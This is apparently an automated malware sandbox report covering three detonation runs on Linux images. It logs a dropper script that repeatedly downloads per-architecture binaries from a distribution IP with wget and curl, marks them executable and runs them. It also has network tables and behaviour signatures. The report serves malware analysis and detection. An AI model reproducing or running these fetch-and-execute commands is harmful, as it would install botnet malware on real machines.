/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-mipsel-20240611-en
Max time kernel
247s
Max time network
281s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x robben sora.sh systemd-private-da7cf7e49fe04dceaaa96479e5c838d9-systemd-timedated.service-nhhpvM]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x robben sora.sh]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
290s
Max time network
298s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-iEKf7O netplan_e2yeal45 robben snap-private-tmp sora.sh ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-hSixl4]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.1.91:443 | ocp-ingress.fastly.gnome.org | tcp |
| GB | 89.187.167.5:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 158.51.127.106:80 | tcp | |
| GB | 84.17.50.8:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 91.189.91.96:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | daisy.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:50
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
223s
Max time network
292s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/sora.sh | N/A |
Processes
/tmp/sora.sh
[/tmp/sora.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-timedated.service-HCpxDg systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-QtAINi robben snap-private-tmp sora.sh ssh-kLQ2HXMTXL6R systemd-private-5e003a358c0f440a8a70128c0d7df8d1-colord.service-Qdn9Ef systemd-private-5e003a358c0f440a8a70128c0d7df8d1-ModemManager.service-h50iFh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-switcheroo-control.service-LorQBf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-logind.service-mtTNhf systemd-private-5e003a358c0f440a8a70128c0d7df8d1-systemd-resolved.service-5HrFRh systemd-private-5e003a358c0f440a8a70128c0d7df8d1-upower.service-eCKh8e]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.17:80 | connectivity-check.ubuntu.com | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |